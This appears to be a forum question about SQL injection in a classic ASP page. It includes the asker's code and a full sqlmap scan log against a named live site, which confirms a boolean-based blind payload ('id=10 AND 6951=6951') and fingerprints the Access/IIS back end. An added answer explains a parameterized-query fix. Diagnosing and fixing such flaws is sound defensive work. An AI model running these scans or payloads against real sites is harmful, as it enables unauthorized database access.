Affected file: CompVisualizeBig.asp

```
set rs=server.createobject("adodb.recordset")
sql="select * from CompVisualize order by id desc"
rs.open sql,conn,1,1

dim MaPerPage
MaPerPage=9
dim text,checkpage
text="0123456789"
Rs.PageSize=MaPerPage

' every character of request("page") has to be a digit
for i=1 to len(request("page"))
    checkpage=instr(1,text,mid(request("page"),i,1))
    if checkpage=0 then
        exit for
    end if
next

If checkpage<>0 then
    If NOT IsEmpty(request("page")) Then
        CurrentPage=Cint(request("page"))
        If CurrentPage < 1 Then CurrentPage = 1
        If CurrentPage > Rs.PageCount Then CurrentPage = Rs.PageCount
    Else
        CurrentPage= 1
    End If
    If not Rs.eof Then
        Rs.AbsolutePage = CurrentPage
    end if
Else
    CurrentPage=1
End if

call list

' subroutine that displays the posts
Sub list()%>
```

```
select * from CompVisualize order by id desc
```

The id is queried without quotes, and that is what produced the SQL injection? Is that right?

```
D:\sqlmap>python sqlmap.py -u http://www.shypost.com/demo/CompVisualizeBig.asp?id=10

         _
 ___ ___| |_ ___ ___  {1.0-dev-nongit-20150806}
|_ -| . | | | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:37:32

[16:37:32] [INFO] testing connection to the target URL
[16:37:33] [INFO] heuristics detected web page charset 'GB2312'
[16:37:33] [INFO] testing if the target URL is stable
[16:37:34] [INFO] target URL is stable
[16:37:34] [INFO] testing if GET parameter 'id' is dynamic
[16:37:34] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:37:34] [INFO] confirming that GET parameter 'id' is dynamic
[16:37:35] [INFO] GET parameter 'id' is dynamic
[16:37:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[16:37:39] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[16:37:39] [INFO] testing for SQL injection on GET parameter 'id'
[16:37:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:37:45] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:37:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:37:45] [WARNING] reflective value(s) found and filtering out
[16:37:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:37:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:37:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:37:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[16:37:47] [INFO] testing 'MySQL inline queries'
[16:37:48] [INFO] testing 'PostgreSQL inline queries'
[16:37:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:37:49] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[16:37:49] [WARNING] time-based comparison requires larger statistical model, please wait...........
[16:37:56] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:37:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:37:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:37:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:37:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[16:37:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:38:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:38:00] [INFO] testing 'Oracle AND time-based blind'
[16:38:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:38:01] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[16:38:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:38:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
sqlmap got a 302 redirect to 'http://www.shypost.com:80/demo/CompVisualizeBig.asp'. Do you want to follow? [Y/n] n
[16:38:46] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 81 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10 AND 6951=6951
---
[16:40:15] [INFO] testing MySQL
[16:40:16] [WARNING] the back-end DBMS is not MySQL
[16:40:16] [INFO] testing Oracle
[16:40:16] [WARNING] the back-end DBMS is not Oracle
[16:40:16] [INFO] testing PostgreSQL
[16:40:17] [WARNING] the back-end DBMS is not PostgreSQL
[16:40:17] [INFO] testing Microsoft SQL Server
[16:40:17] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:40:17] [INFO] testing SQLite
[16:40:18] [WARNING] the back-end DBMS is not SQLite
[16:40:18] [INFO] testing Microsoft Access
[16:40:18] [INFO] confirming Microsoft Access
[16:40:22] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[16:40:22] [INFO] fetched data logged to text files under

[*] shutting down at 16:40:22
```
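On the question of the unquoted id: the posted code already whitelists request("page") one digit at a time, and the same treatment for request("id"), followed by binding the value as an ADODB parameter instead of concatenating it into the statement, is the fix a reviewer would ask for. The block below is an added example, not code from the original post; it assumes an open ADODB.Connection named conn (as in the posted code) and an integer id column in CompVisualize, and the WHERE clause on id is assumed because the excerpt does not show it.

```vbscript
<%
' Added example, not from the original post. Assumes an open ADODB.Connection
' named conn (as in the posted code) and an integer id column in CompVisualize.

' True only for a non-empty string of ASCII digits (the same whitelist the
' posted code applies to request("page")); 9 digits keeps the value in CLng range.
Function IsDigitsOnly(s)
    Dim i
    IsDigitsOnly = False
    If Len(s) = 0 Or Len(s) > 9 Then Exit Function
    For i = 1 To Len(s)
        If InStr(1, "0123456789", Mid(s, i, 1)) = 0 Then Exit Function
    Next
    IsDigitsOnly = True
End Function

' Looks up one CompVisualize row by id. The value is bound as a parameter
' ("?" is the Jet/Access OLE DB placeholder) so it never becomes SQL text.
' Returns Nothing when the supplied id is not a plain integer.
Function GetCompVisualizeById(dbConn, rawId)
    Set GetCompVisualizeById = Nothing
    If Not IsDigitsOnly(rawId) Then Exit Function

    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = dbConn
    cmd.CommandType = 1          ' adCmdText
    cmd.CommandText = "SELECT * FROM CompVisualize WHERE id = ?"
    ' adInteger = 3, adParamInput = 1
    cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(rawId))
    Set GetCompVisualizeById = cmd.Execute
End Function

Dim rs
Set rs = GetCompVisualizeById(conn, Request.QueryString("id"))
If rs Is Nothing Then
    ' reject instead of silently defaulting, so bad input shows up in the IIS logs
    Response.Status = "400 Bad Request"
    Response.Write "invalid id"
    Response.End
End If
%>
```

Quoting a numeric value in the SQL string does not by itself close the hole; the digit check plus the bound parameter does, regardless of quoting.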